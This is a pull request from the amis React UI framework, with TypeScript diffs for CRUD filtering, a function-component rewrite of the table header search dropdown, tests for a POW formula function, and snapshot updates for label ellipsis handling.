loadDataOnceFetchOnFilter: true, autoFillHeight: false }; @@ -997,7 +1000,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { undefined, undefined, undefined, - loadDataOnceFetchOnFilter, + loadDataOnceFetchOnFilter !== false, isInit ); } @@ -1190,7 +1193,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { pickerMode, env, loadDataOnce, - loadDataOnceFetchOnFilter, source, columns, dispatchEvent @@ -1228,7 +1230,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { autoAppend: true, forceReload, loadDataOnce, - loadDataOnceFetchOnFilter, source, silent, pageField, @@ -1670,11 +1671,18 @@ export default class CRUD extends React.Component<CRUDProps, any> { handleQuery( values: object, - forceReload: boolean = false, + forceReload?: boolean, replace?: boolean, resetPage?: boolean ) { - const {store, syncLocation, env, pageField, perPageField} = this.props; + const { + store, + syncLocation, + env, + pageField, + perPageField, + loadDataOnceFetchOnFilter + } = this.props; store.updateQuery( resetPage ? { @@ -1690,7 +1698,12 @@ export default class CRUD extends React.Component<CRUDProps, any> { perPageField, replace ); - this.search(undefined, undefined, replace, forceReload); + this.search( + undefined, + undefined, + replace, + forceReload ?? 
loadDataOnceFetchOnFilter === true + ); } reload( diff --git a/packages/amis/src/renderers/CRUD2.tsx b/packages/amis/src/renderers/CRUD2.tsx index 366d2bb5d..b5cd55a15 100644 --- a/packages/amis/src/renderers/CRUD2.tsx +++ b/packages/amis/src/renderers/CRUD2.tsx @@ -537,7 +537,6 @@ export default class CRUD2 extends React.Component<CRUD2Props, any> { env, loadType, loadDataOnce, - loadDataOnceFetchOnFilter, source, columns, perPage @@ -574,7 +573,6 @@ export default class CRUD2 extends React.Component<CRUD2Props, any> { autoAppend: true, forceReload, loadDataOnce, - loadDataOnceFetchOnFilter, source, silent, pageField, diff --git a/packages/amis/src/renderers/Form/TabsTransfer.tsx b/packages/amis/src/renderers/Form/TabsTransfer.tsx index e24186f84..efe1c6d88 100644 --- a/packages/amis/src/renderers/Form/TabsTransfer.tsx +++ b/packages/amis/src/renderers/Form/TabsTransfer.tsx @@ -242,7 +242,7 @@ export class TabsTransferRenderer extends BaseTabsTransferRenderer<TabsTransferP @autobind optionItemRender(option: any, states: ItemRenderStates) { - const {menuTpl, render, data} = this.props; + const {menuTpl, render, data, classnames} = this.props; const ctx = arguments[2] || {}; if (menuTpl) { @@ -257,7 +257,7 @@ export class TabsTransferRenderer extends BaseTabsTransferRenderer<TabsTransferP }); } - return BaseSelection.itemRender(option, states); + return BaseSelection.itemRender(option, {...states, classnames}); } // 动作 diff --git a/packages/amis/src/renderers/Form/TabsTransferPicker.tsx b/packages/amis/src/renderers/Form/TabsTransferPicker.tsx index cdca05272..53166e0e2 100644 --- a/packages/amis/src/renderers/Form/TabsTransferPicker.tsx +++ b/packages/amis/src/renderers/Form/TabsTransferPicker.tsx @@ -53,7 +53,7 @@ export class TabsTransferPickerRenderer extends BaseTabsTransferRenderer<TabsTra @autobind optionItemRender(option: any, states: ItemRenderStates) { - const {menuTpl, render, data} = this.props; + const {menuTpl, render, data, classnames} = this.props; 
const ctx = arguments[2] || {}; if (menuTpl) { @@ -68,7 +68,7 @@ export class TabsTransferPickerRenderer extends BaseTabsTransferRenderer<TabsTra }); } - return BaseSelection.itemRender(option, states); + return BaseSelection.itemRender(option, {...states, classnames}); } // 动作 diff --git a/packages/amis/src/renderers/Json.tsx b/packages/amis/src/renderers/Json.tsx index 87b3735f6..31bdee6fc 100644 --- a/packages/amis/src/renderers/Json.tsx +++ b/packages/amis/src/renderers/Json.tsx @@ -4,9 +4,15 @@ import {Renderer, RendererProps} from 'amis-core'; import type {InteractionProps} from 'react-json-view'; import {autobind, getPropValue, noop} from 'amis-core'; import {BaseSchema} from '../Schema'; -import {resolveVariableAndFilter, isPureVariable} from 'amis-core'; - -export const JsonView = React.lazy(() => import('react-json-view')); +import { + resolveVariableAndFilter, + isPureVariable, + importLazyComponent +} from 'amis-core'; + +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * JSON 数据展示控件。 * 文档:https://aisuda.bce.baidu.com/amis/zh-CN/components/json diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - 
HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close = this.close.bind(this); - this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? 
searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: 
any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? 
() => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? 
() => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> );
fix: Form组件配置页面跳转事件可能会导致持久化数据无法清除问题 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 6556104</samp> This pull request introduces a new feature for the form renderer to clear the local persist data of the form store. This can help avoid data inconsistency issues when the form data is submitted to the server or the page route changes. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 6556104</samp> > _To clear the persist data of the form_ > _We added a prop to the renderer norm_ > _`clearPersistDataAfterSubmit`_ > _Will do the trick, bit by bit_ > _And keep the form store and route in good form_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 6556104</samp> * Add a feature to clear the local persist data of the form store before or after submitting the form data, depending on the user's preference and the outcome of the submission. ([link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158), [link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1190), [link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1251)) * In `packages/amis-core/src/renderers/Form.tsx`, check the `clearPersistDataAfterSubmit` prop of the form before calling the `submitToTarget` method. If it is true, clear the persist data using the `store.clearPersistData` method. ([link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158))
**Title** Fix form persistence leakage on navigation and improve CRUD filtering, UI rendering, and formula support **Problem** - After a form submission that triggers a page route change, the form’s locally persisted data is not cleared, leading to stale values when the user returns. - CRUD components exhibit inconsistent behavior when `loadDataOnce` is enabled, especially regarding whether filter actions re‑request data. - Several UI components suffer from label overflow, missing ellipsis handling, and drag‑event handling in non‑editable mode. **Root Cause** - The form store clears persisted data only after asynchronous submit handling, so a route change can leave the previous `persistKey` active. - The `loadDataOnceFetchOnFilter` flag’s default handling was ambiguous, causing unexpected API calls during filtering. - Search and selection components relied on ad‑hoc regex matching and lacked proper class name handling for truncation and accessibility. **Fix / Expected Behavior** - Clear the form store’s local persisted data immediately when `clearPersistDataAfterSubmit` is enabled, before any navigation occurs. - Honor the `loadDataOnceFetchOnFilter` property explicitly, allowing developers to control whether filter actions trigger a new API request. - Replace fragile regex filtering with fuzzy matching via `match-sorter` for CRUD, editor search panels, and component lists. - Add the `POW` mathematical function to the formula engine with documentation. - Adjust UI styles to enforce label width, apply ellipsis truncation, and correctly pass class‑name utilities to selection components. - Restrict drag‑and‑drop event listeners in the editor preview to editable mode only and improve lazy loading of `react‑json‑view`. **Risk & Validation** - Verify that form submissions no longer retain stale persisted data after navigation and that other store operations remain unaffected. 
- Test CRUD pages with `loadDataOnce` enabled to confirm filter behavior matches the configured `loadDataOnceFetchOnFilter` setting. - Run UI regression tests to ensure label truncation, selection rendering, and drag‑and‑drop behave as expected across editable and read‑only modes.
8,354
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +}) diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index d6b34c6b5..043ea6389 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -166,7 +166,6 @@ test('3. 
Renderer:crud loadDataOnce', async () => { columnsNum: 4, showBtnToolbar: false }, - filterSettingSource: ['version'], columns: [ { name: 'id', diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap index 1a6c79084..57a2487ef 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap @@ -471,7 +471,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -491,7 +492,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-1 " > group-1-option-1 </span> @@ -513,7 +515,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-2 " > group-1-option-2 </span> @@ -535,7 +538,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-3 " > group-1-option-3 </span> @@ -1157,7 +1161,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1171,7 +1176,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2 " > group-2 </span> @@ -1185,7 +1191,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" 
cxd-Selection-ellipsis-line" + title="group-3 " > group-3 </span> @@ -1199,7 +1206,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-4 " > group-4 </span> @@ -1268,7 +1276,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-1 " > group-1-option-1 </span> @@ -1282,7 +1291,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-2 " > group-1-option-2 </span> @@ -1296,7 +1306,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-3 " > group-1-option-3 </span> @@ -1310,7 +1321,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-4 " > group-1-option-4 </span> @@ -1771,7 +1783,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1791,7 +1804,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-1 " > option-1 </span> @@ -1813,7 +1827,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-2 " > option-2 </span> @@ -1835,7 +1850,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + 
class=" cxd-Selection-ellipsis-line" + title="option-3 " > option-3 </span> diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap index 3e3cadfc1..3fbb9b87e 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap @@ -538,7 +538,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师2 " > 法师2 </span> @@ -551,7 +552,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士2 " > 战士2 </span> @@ -564,7 +566,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野2 " > 打野2 </span> @@ -1134,7 +1137,8 @@ exports[`Renderer:tabsTransfer with deferApi 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师2 " > 法师2 </span> diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index 1819c39f3..f2abb89c4 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -119,7 +119,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -144,7 +145,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -169,7 +171,8 @@ exports[`Renderer:transfer 1`] = ` 
class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -194,7 +197,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -219,7 +223,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -244,7 +249,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -669,7 +675,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-1 " > label-1 </span> @@ -695,7 +702,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-2 " > label-2 </span> @@ -721,7 +729,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-3 " > label-3 </span> @@ -747,7 +756,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-4 " > label-4 </span> @@ -1018,7 +1028,8 @@ exports[`Renderer:transfer chained 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -1031,7 +1042,8 @@ exports[`Renderer:transfer chained 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -1044,7 +1056,8 @@ exports[`Renderer:transfer chained 1`] = ` 
class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -1251,7 +1264,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1264,7 +1278,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2 " > group-2 </span> @@ -1277,7 +1292,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-3 " > group-3 </span> @@ -1290,7 +1306,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-4 " > group-4 </span> @@ -1303,7 +1320,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-5 " > group-5 </span> @@ -1316,7 +1334,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-6 " > group-6 </span> @@ -1329,7 +1348,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-7 " > group-7 </span> @@ -1342,7 +1362,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-8 " > group-8 </span> @@ -1355,7 +1376,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - 
class="" + class=" cxd-Selection-ellipsis-line" + title="group-9 " > group-9 </span> @@ -1368,7 +1390,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-10 " > group-10 </span> @@ -1407,7 +1430,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-1 " > group-2-option-1 </span> @@ -1433,7 +1457,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-2 " > group-2-option-2 </span> @@ -1459,7 +1484,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-3 " > group-2-option-3 </span> @@ -1485,7 +1511,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-4 " > group-2-option-4 </span> @@ -1776,7 +1803,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -1816,7 +1844,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -1861,7 +1890,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -1901,7 +1931,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -1941,7 +1972,8 @@ exports[`Renderer:transfer follow left mode 1`] = 
` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -1986,7 +2018,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -2026,7 +2059,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -2066,7 +2100,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -2106,7 +2141,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -2176,7 +2212,10 @@ exports[`Renderer:transfer follow left mode 1`] = ` class="cxd-Tree-itemText" title="法师" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="法师" + > 法师 </span> </span> @@ -2212,7 +2251,10 @@ exports[`Renderer:transfer follow left mode 1`] = ` class="cxd-Tree-itemText" title="诸葛亮" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="诸葛亮" + > 诸葛亮 </span> </span> @@ -2444,7 +2486,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -2484,7 +2527,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -2529,7 +2573,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -2569,7 +2614,8 @@ 